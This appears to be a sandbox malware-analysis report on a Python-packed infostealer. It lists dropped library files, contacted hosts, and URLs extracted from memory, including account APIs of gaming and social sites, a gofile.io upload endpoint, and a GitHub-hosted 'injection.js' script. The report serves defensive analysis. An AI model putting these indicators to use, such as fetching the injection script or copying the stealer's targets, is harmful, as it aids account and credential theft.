C:\Users\user\AppData\Local\Temp\_MEI12922\_overlapped.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\_queue.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\_socket.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\_sqlite3.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\_ssl.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\_uuid.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_helpers.cp310-win_amd64.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_parser.cp310-win_amd64.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_writer.cp310-win_amd64.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_websocket.cp310-win_amd64.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings\_rust.pyd | 5% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist\_frozenlist.cp310-win_amd64.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\libcrypto-1_1.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\libffi-7.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\libssl-1_1.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\multidict\_multidict.cp310-win_amd64.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\propcache\_helpers_c.cp310-win_amd64.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\pyexpat.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\python3.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\python310.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\select.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\sqlite3.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\unicodedata.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI12922\yarl\_quoting_c.cp310-win_amd64.pyd | 0% | ReversingLabs
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label | Link
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
http://ip-api.com/json | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.136.232 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | false | | unknown
store1.gofile.io | 45.112.123.227 | true | false | | unknown
api.gofile.io | 45.112.123.126 | true | false | | unknown
198.187.3.20.in-addr.arpa | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/json | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://account.riotgames.com/api/account/v1/user | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://accounts.reddit.com/api/access_token | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9 | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446094364.0000018B48C90000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://github.com/pyca/cryptography/issues/8996 | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp | false | | unknown
https://go.microsoft.co | powershell.exe, 00000051.00000002.2338573080.00000260D91D6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://github.com/python-attrs/attrs/issues/251 | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2443973271.0000018B4797A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433238655.0000018B4797A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2427074219.0000018B4797A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2432689144.0000018B4797A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://klaviyo.com/ | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr | false | | unknown
https://tiktok.com/ | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://github.com/aio-libs/aiohttp/discussions/6044 | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434786649.0000018B47625000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442892896.0000018B47626000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429421045.0000018B47A65000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445032411.0000018B47EF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://python.org | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442501130.0000018B474B0000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://python.org/dev/peps/pep-0263/ | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454057077.00007FFD943CE000.00000040.00000001.01000000.00000004.sdmp | false | | unknown
https://www.attrs.org/en/24.2.0/_static/sponsors/ | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr | false | | unknown
http://python.org:80 | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442501130.0000018B474B0000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440123869.0000018B4511E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434927135.0000018B4511D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://github.com/sponsors/hynek | METADATA.0.dr | false | | unknown
https://github.com/python-attrs/attrs/issues/1328) | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr | false | | unknown
https://github.com/pyca/cryptography/actions?query=workflow%3ACI | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr | false | | unknown
https://oauth.reddit.com/api/v1/me | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.apache.org/licenses/LICENSE-2.0 | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122665167.000002BD86731000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122726494.000002BD86731000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122665167.000002BD86724000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://store1.gofile.io/uploadFile | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://support.mozilla.org/kb/custom | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447278741.0000018B49DB7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr | false | | unknown
https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek). | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr | false | | unknown
https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization) | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr | false | | unknown
https://github.com/python-attrs/attrs) | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr | false | | unknown
https://www.attrs.org/) | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr | false | | unknown
https://i.hizliresim.com/8po0puy.jfifPY9H | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://twitter.com | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://twitter.com/home | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000051.00000002.2334646014.00000260D11EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000051.00000002.2334646014.00000260D1331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://docs.python.org/3/library/subprocess#subprocess.Popen.kill | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444712748.0000018B47CB0000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://github.com/python-attrs/attrs/issues/136 | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437876998.0000018B47955000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2427074219.0000018B478B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435278581.0000018B47933000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434510034.0000018B47C3D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://i.hizliresim.com/6t31tw2.jpg0m9H | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://i.hizliresim.com/8po0puy.jfif | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444712748.0000018B47CB0000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://github.com/python-attrs/attrs/issues/1329) | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000051.00000002.2305154049.00000260C1181000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444818506.0000018B47DC0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://json.org | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440363772.0000018B45190000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46E70000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688 | SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46EF8000.00000004.00001000.00020000.00000000.sdmp | false
                                                                                                      unknown
                                                                                                      https://github.com/python-attrs/attrs/issues/1330)SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                        unknown
                                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000051.00000002.2305154049.00000260C2A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000051.00000002.2305154049.00000260C2A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000051.00000002.2339941788.00000260D93F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codeSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46EF8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://go.micropowershell.exe, 00000051.00000002.2305154049.00000260C1DB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://instagram.com/pSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://raw.githubusercontent.com/justforExela/injection/main/injection.jsSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441640857.0000018B47386000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434720630.0000018B47384000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429494966.0000018B47368000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2419006328.0000018B47366000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440123869.0000018B4511E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434927135.0000018B4511D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://contoso.com/Iconpowershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://discord.com/api/v8/users/SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://i.hizliresim.com/qxnzimj.jpgSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://www.apache.org/licenses/SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122665167.000002BD86724000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://www.attrs.org/en/latest/names.html)SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                            unknown
                                                                                                                            https://www.twitch.tv/SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=mainSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drfalse
                                                                                                                                unknown
                                                                                                                                https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-fileSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://open.spotify.com/user/SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46EF8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46E70000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://filepreviews.io/SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                          unknown
                                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444712748.0000018B47CB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://www.attrs.org/en/stable/why.html#data-classes)SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                            unknown
                                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000051.00000002.2305154049.00000260C2A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://cryptography.io/en/latest/installation/SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drfalse
                                                                                                                                                unknown
                                                                                                                                                https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sySecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440123869.0000018B4511E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434927135.0000018B4511D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
